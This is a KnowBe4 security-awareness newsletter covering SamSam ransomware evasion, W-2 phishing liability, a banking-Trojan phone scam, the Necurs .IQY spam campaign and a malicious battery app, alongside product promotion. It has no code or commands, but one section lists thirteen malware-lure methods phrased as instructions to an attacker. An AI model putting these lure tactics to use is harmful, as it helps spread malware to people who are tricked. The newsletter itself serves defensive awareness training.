CyberheistNews Vol 8 #26 [Heads-up] New Sleeper Strain of SamSam Ransomware Bypasses AV And Stays Hidden On Your Network

CyberheistNews Vol 8 #26
[Heads-up] New Sleeper Strain of SamSam Ransomware Bypasses AV And Stays Hidden On Your Network

The ransomware strain that crippled several cities and school districts in the U.S. earlier this year is back with more tricks up its sleeve to avoid detection.

If you haven’t heard of SamSam, you haven’t been paying attention. Just one example of the kind of destruction they can cause is the recent attack on the Colorado Department of Transportation which caused downtime for 2,000+ systems.

This new SamSam strain adds a human element to its already devious mix of evasive techniques to keep antivirus, endpoint, and even more advanced security software from detecting it.

SamSam avoids being discovered using sophisticated methods of constructing its payload and how it executes. In a recent blog, endpoint protection company Malwarebytes provides a detailed technical explanation of how this new variant of SamSam works.

Your Executive Summary

Your executive summary is this SamSam strain avoids detection using three advanced techniques:
  • It decrypts the payload only at run-time, making it nearly impossible to identify and analyze.
  • The loader, payload, and logs are wiped, leaving very few traces behind for any forensics or scanning tools.
  • It requires a password to be entered by the threat actor to run in the first place.
It’s that last part of the attack that makes this latest strain so dangerous. Unlike most ransomware strains which are designed to spread automatically, this new strain of SamSam is designed for targeted attacks.

By requiring a password, the payload remains encrypted (and, therefore, an absolute secret), only woken up when and where the bad guys choose to unleash it in your network, all at the same moment to create the biggest impact and damage.

Do You Want The Good News Or The Bad News?

The good news is that, should users accidentally download this strain of ransomware, or your network is compromised via an RDP brute-force attack, the payload is harmless without the password to run it. The bad news is, should the SamSam gang decide that your organization is next up to be extorted, all your users will be sitting on their hands for possibly weeks if your backups fail. Continued at the KnowBe4 blog:
[BREAKING NEWS] Employees Sue Company For W-2 Phishing Scam. Federal Court Decides Triple Damages

Imagine my surprise when I saw a picture of myself in the blog of large North Carolina Law firm Poyner Spruill. It was all good though.

They had picked up an example of a real W-2 phishing scam we received that I had posted on our own blog. The screenshot was a good illustration of the risks of W-2 CEO Fraud.

However, the article literally raised my eyebrows. Why?

Read this and then send this post to your CEO and your legal team right away.

According to a recent federal court decision, an employee who is tricked into sharing personal information in response to a phishing email can be seen as committing an intentional disclosure under the North Carolina Identity Theft Protection Act (NCITPA). As a result, the employer could face treble damages for the employee’s mistake, adding a new element to potential exposure for businesses.

Employees who fall for CEO Fraud commit an "intentional disclosure".

Poyner Spruill's J.M Durnovich was right to highlight this development, which was also picked up by the nationwide Law360 site.

The failure to train employees may quickly become more costly not only for for North Carolina employers. This decision will be looked at by other courts who very well might come to the same conclusion that not taking reasonable measures to defend against scams like this merits treble (punitive) damages.

Here is a short extract from the Poyner Spruill post which I strongly recommend you read in full. Continued at KnowBe4 blog:
[ALERT] There Is A New Hybrid Cyber Attack On Banks And Credit Unions In The Wild

A customer just called me. He found a new strain of attack that's the next scary thing your organization may become the target of.

He's been using our platform for 6 years, first at a bank where he selected our platform and deployed it, and in his second job, they already used KnowBe4 to create their human firewall so he got off to a running start.

The issue he warned me about today is the following. There is a new hybrid attack that starts with a Banking Trojan which gets on the machine by using social engineering to get in, suspected to be email.

Once the Trojan kicks in, it looks in real time for the word "bank" in the browser and if it sees the end user go to their bank, they redirect the user to a malicious site that looks like that bank and steals their credentials. Up to now this is nothing new.

However, here is the wrinkle...

The Trojan starts to slow down the browser, and simulates "technical problems" with the site for a few minutes. Then it comes up with another popup which asks for their name and phone number so that "support can call them back".

Next, the end-user gets a phone call from a live bad guy, claiming to be the support team of the bank, who then starts to social engineer the customer real-time and tries to manipulate the end user into divulging more detail so that the bad guy can make an immediate transfer out of the account.

This is the first time that we hear about this nasty variant on the tech support scam, but now looks like it's tailor-made for a certain bank. You can count on this tactic being used soon for credit unions as well. Not good. Be warned!
Do employees open your network to the bad guys by using hacked passwords?

A whopping 25% of employees are using the same password for all logins. What if that password is available on the dark web? A massive amount of passwords are compromised due to data breaches and used by the bad guys for attacks. Are any hacked passwords in use within your organization?

Using breached passwords puts your network at risk. Password policies often do not prevent employees using known bad passwords. Making your users frequently change their passwords isn’t a good solution either. It only takes one compromised password match for the bad guys to gain access.

KnowBe4’s complimentary NEW Breached Password Test (BPT) checks to see if your users are currently using passwords that are in publicly available breaches associated with your domain. BPT checks against your Active Directory and reports compromised passwords in use right now so that you can take action immediately!

Here’s how Breached Password Test works:
  • Checks to see if your company domains have been part of a data breach that included passwords
  • Checks to see if any of those breached passwords are currently in use in your Active Directory
  • Does not show/report on the actual passwords of accounts
  • Just download the install and run it
  • Results in a few minutes!
Find out now which users are using hacked passwords!
Don't Underestimate The Economic Side of Russia's Cyber Warfare

I just ran into an excellent article by Boris Zilberman, deputy director of congressional relations and a Russia analyst at the Foundation for Defense of Democracies. It was posted at The Cipher Brief, which is a digital, security-based conversation platform that connects the private sector with the world`s leading security experts. You should check it out, warmly recommended.

Zilberman is making some very important points that reinforce what I have been saying here about Russia and Vladimir Putin. At the end of this post is a link to a 24-page PDF that contains the detail and meticulous documentation.

This is your executive summary:

Cyber-enabled economic warfare is hardwired into the Russian legal system. It's no accident that Russian law establishes the Federal Security Service (FSB)-the successor to the KGB-as the licensing authority for encryption activities.

By design, the laws and regulations governing information systems, telecomm, and encryption give the Kremlin and its security services tools to consolidate power internally and engage in aggressive activities abroad.

The FSB can even require private companies to provide direct assistance to its online endeavors at home and abroad. Perhaps with this in mind, the European Union recently called on its members to ban malicious technology and telecommunications equipment and software including products from Kaspersky Lab.

Full story and links here:
NEW Whitepaper: The 2018 Phishing By Industry Benchmarking Report

As a security leader, you’re faced with a tough choice.

Even as you increase your budget for sophisticated security software, your exposure to cybercrime keeps going up!

IT security seems to be a race between effective technology and clever attack methods. However, there’s an often-overlooked security layer that can significantly reduce your organization’s attack surface: New-school security awareness training.

In this report, brand-new research from KnowBe4 highlights employee Phish-prone™ percentages by industry, revealing at-risk users that are susceptible to phishing or social engineering attacks.

Taking it a step further, the research also reveals radical drops in careless clicking after 90 days and 12 months of new-school security awareness training.

Do you know how your organization compares to your peers of similar size?

Download this whitepaper to find out!
Exclusive Interview with Kevin Mitnick Ask Me Anything [VIDEO]

KnowBe4's Chief Hacking Officer Kevin Mitnick sat down with our team for an exclusive interview where we could ask him anything… We thought you’d like to hear his answers, too. Ever wonder what he thinks about pen testing, how he got into the business, why he works with KnowBe4? Find out now, 7 minutes well spent! See it here, great for a short break:

Let's stay safe out there.

Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc

Quotes of the Week
"The Constitution only gives people the right to pursue happiness. You have to catch it yourself."
- Benjamin Franklin, Statesman (1706 - 1790)

"Exactitude in some small matters is the very soul of discipline."
- Joseph Conrad, Writer (1857 - 1924)

Thanks for reading CyberheistNews
Security News
The World's-Largest Necurs Botnet Gets Creative

Barkly researchers have identified the third wave of an attack that began in late May. The Necurs Botnet is driving a new spam campaign using Excel Web Query (.IQY) attachments.

These tend to arrive undetected. The attack has the potential to deliver FlawedAmmyy, a remote access trojan (RAT.) .IQY files are not inspected by AV engines as are full Excel spreadsheets.

Since they are relatively small simple text files and have little history of being weaponized, .IQY files are not usually indexed by traditional anti-virus software. Their ability to act as downloaders, which once launched in Excel are activated and download malicious content, make them extremely dangerous.

FlawedAmmyy is built from source code of legitimate desktop software Ammyy Admin. The malware has been in use since early 2016. FlawedAmmyy performs the same functions as the legitimate version, but it also allows data theft and conscription of victim machines into spam campaigns.

Two campaigns have been credited with using FlawedAmmyy: a targeted email attack focused on the automotive industry, and a multi-million message campaign active for the past four years and associated with threat actor TA505.

Accounting for close to 90% of daily spam, Necurs has been called the "Scarface of spam." Cisco's Talos unit identifies it as the world’s largest spambot. Necurs traffic between August and November topped 2.1 million spam messages originating from 1.2 million unique IP addresses in over 200 countries.

The use of .IQY files by criminals will probably continue, so having a proactive plan to protect your data is highly recommended. The first line of protection, of course, is a culture of security, build and sustained by regular, realistic interactive training to recognize phishing attempts. ThreatPost has the story:
It Saves Your Battery, but Its Social Engineering Steals Your Data

Google Play is a walled garden, but the serpents do find their way in. RiskIQ has found one snake with a tempting offer on its forked tongue: an app that "saves the battery" in your mobile device.

It begins with a vaguely plausible pop-up: "Samsung clean-up might be required! Your Samsung SM-G925A might be slowed down and your battery may discharges quickly. Please clean your Samsung memory to solve this problem and increase phone speed. Install recommended app to clean your Samsung immediately!"

Connoisseurs of social engineering will recognize the weak grammar in the second sentence of the come-on. They will also recognize the immediacy of the invitation. Calling the app "recommended" is a nice touch, and the fact there is no cost can be hard to resist.

If you do click "Install," you'll be taken to Google Play, and there you'll find the app as advertised. If you look at the permissions it requests, you'll say "no." Those permissions include the following, and there are many others:
  • "Read sensitive log data"
  • "Receive text messages (SMS)"
  • "Receive data from Internet"
  • "Pair with Bluetooth devices"
  • "Full network access"
  • "Modify system settings"
All of these should put the user on guard. The app also installs an ad-clicker backdoor that harvests additional information. It's interesting to note that in addition to all of this badness, the app actually does do the things it promised up front. It reduces battery strain, it kills battery-use-intensive processes when charge is low, and it monitors battery status. None of this, of course, is worth it.

There are several lessons here that any organization might want to share with its employees. First, don't assume that all the apps in the Play store are legit. Google Play is working hard to clean out the snakes, but they still find their way in, similar to Apple's store.

The developer transparency of the Play store can help you recognize repeat offenders. Second, look for linguistic clues that you're being scammed. Many criminal organizations are international, and they often stumble over the harder parts of their language.

See the second sentence of the pop-up for an example: "your battery may discharges quickly." Third, beware of attempts to rush you. "Immediately" and "now" should put you on your guard. And finally, read the permissions an app wants before you install it.

All of these lessons can be reinforced with new-school security awareness training. See RiskIQ's blog for the story of this particular social engineering scam:
Different Criminals, Different Techniques, but Common Weaknesses

HackRead has identified thirteen distinct ways criminals spread malware. They all involve some form of social engineering. It's interesting to see the variations criminal ingenuity throws up, and worth thinking of these approaches when you conduct awareness training for your organization's employees.
    1. Setting up micro job websites, crowdsourcing platforms where people pick up small jobs for small amounts of money, can draw in the marks. They're especially convincing and effective when they're accompanied by a password-protected archive in Dropbox or Google Drive.

    2. Or social network spam might work: game cheats are particularly popular.

    3. Establish a bogus Facebook profile to attract likes. Offer a cheap or even free program as a make-money-at-home scheme. Eventually you'll have people installing the malware you set up there.

    4. YouTube spam is effective at getting people to install code better left alone.

    5. Watering holes are common modes of infection. It's easy to set up a WordPress site, and commodity, turnkey malicious script is readily available on the black market.

    6. Anonymous chat rooms can be baited with adult content.

    7. Spamming themed chat rooms on Telegram. The chat room of course should be booby-trapped.

    8. Hawk a plausible but off-the-beaten track money-making scheme.

    9. Post a malicious browser game. These are especially popular with children.

    10. Use a dating site to build trust to a point where the scammer and the mark are exchanging photos. The scammer's photos, of course, are malicious.

    11. Contact partners of romance scam victims and tell them you're having an affair with their significant other. Offer photos as proof. These photos too are baited with malware.

    12. Attract marks on a dark web forum by offering a malicious document that purports to contain, and may in fact contain, a money-making scheme. The document will also, of course, contain malware.

    13. Copy the software section from a cryptomining forum, machine-translate it into another language, post it in an appropriate mining forum, and add a link that purports to go to the software. The link should go to an information stealer.
These are thirteen methods, but they all represent variations on five traditional human weaknesses: greed, lust, jealousy, sloth, and boredom. Interactive training to resist social engineering can almost be a kind of imagination of conscience. HackRead had the story:
Even Law Firms Suffer From Social Engineering

They may not fall for an advance fee scam from an emailer claiming to be the widow of a Nigerian prince, but law firms have their issues with social engineering, too.

An early case hit a Connecticut personal injury law firm in 2008. They received an email, apparently from an attorney in North Carolina who said she was attempting to settle a debt a Chinese company owed a company based in Connecticut.

It appeared to be a straightforward collection issue. The director of the Chinese company signed a retainer agreement with the Connecticut law firm, sent them a $200,000 check drawn on Wachovia Bank, and subsequently instructed the law firm to wire payment to a South Korean bank, which they did.

The problem was this: the North Carolina attorney, the Chinese metallurgical firm, and the Connecticut company were all real, but none of them knew anything about the matter. They had, in fact, been impersonated, and the $200,000 check was bogus. The Connecticut law firm was out the money.

The social engineering attack was complex, convincing, and played out over a couple of weeks.

That was unusual ten years ago. Unfortunately today it's more common. Social engineers going after bigger phish do their homework and tailor their messaging for plausibility.

You might think that people as accustomed to dealing with the crooked timber of humanity as attorneys would be forearmed against most forms of fraud. But social engineering can be surprisingly persuasive.

Law firms and other professional companies with similar responsibilities—one thinks of accounting firms—would benefit from a review of their policies.

They would also benefit from realistic, interactive security awareness training for their partners, associates, and staff tailored to the kinds of scams they're too likely to encounter. The ABA Journal has the story:
What Is the Difference Between a Hack and a Breach?

The terms data breach and hack are often used interchangeably, but there are some differences: a breach is when data is unintentionally left unsecured and vulnerable to hacking, as a result of malicious activity or from negligence.

A hack specifically refers to the activities of cyber attackers who purposely compromise IT infrastructure to steal information or to hold systems ransom. If your data was part of a breach, it’s possible it was just left exposed online and was not stolen. Likewise, not all hacks result in breaches.
What KnowBe4 Customers Say

"Thanks Stu. Everything is working well. We switched over from Wombat and our end users are definitely having an easier, more intuitive experience when using the training modules. Julia Smith was our sales manager, she did an excellent job answering all of our questions and went above and beyond during the process."" - S.S., IT Network Admin

"Hello Stu, So far we’ve been very happy with your service. We are still in the early stages, but it’s filled an important gap and taken a lot of work off of my shoulders as IT manager.

The training videos are going over well and the phishing tests have successfully started making employees more aware of being security conscious, both at work and at home.

I also appreciate the newsletter/blogs you’ve been sending. Short and to the point, with links to further details if wanted. Overall, we’re quite happy with your service and feel like it’s money well-spent. Regards, C.S., Information Systems Manager

"Hi Stu. Thanks for the follow up. Your product to date has been great. Much better than our previous solution provided by Phishline. Keep adding new features and content! Thanks." H.C., Director Of IT Security
The 10 Interesting News Items This Week
    1. Hackers who sabotaged the Olympic games return for more mischief:

    2. Faked Video Will Complicate Justice by Twitter Mob:

    3. Free Societies are at a Disadvantage in National Cybersecurity:

    4. Email Phishers Using a Simple Way to Bypass MS Office 365 Protection:

    5. Hackers Hit Satellite Operators and Telecoms, Symantec Says:

    6. Cybersecurity Disclosures Should Be Beefed Up, Speeded up Says SEC Commissioner:

    7. Oregon.Gov Email Domain Remains Blacklisted:

    8. FBI Publishes its 2017 Internet Crime Report. Here are the highlights:

    9. US-CERT Uncovers North Korean Typeframe Malware:

    10. Meet MyloBot - A New Highly Sophisticated Never-Seen-Before Botnet That's Out in the Wild:
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff
FOLLOW US ON: Twitter | LinkedIn | YouTube
Copyright © 2014-2018 KnowBe4, Inc. All rights reserved.

Subscribe To Our Blog

Weak Password Test Contest

Get the latest about social engineering

Subscribe to CyberheistNews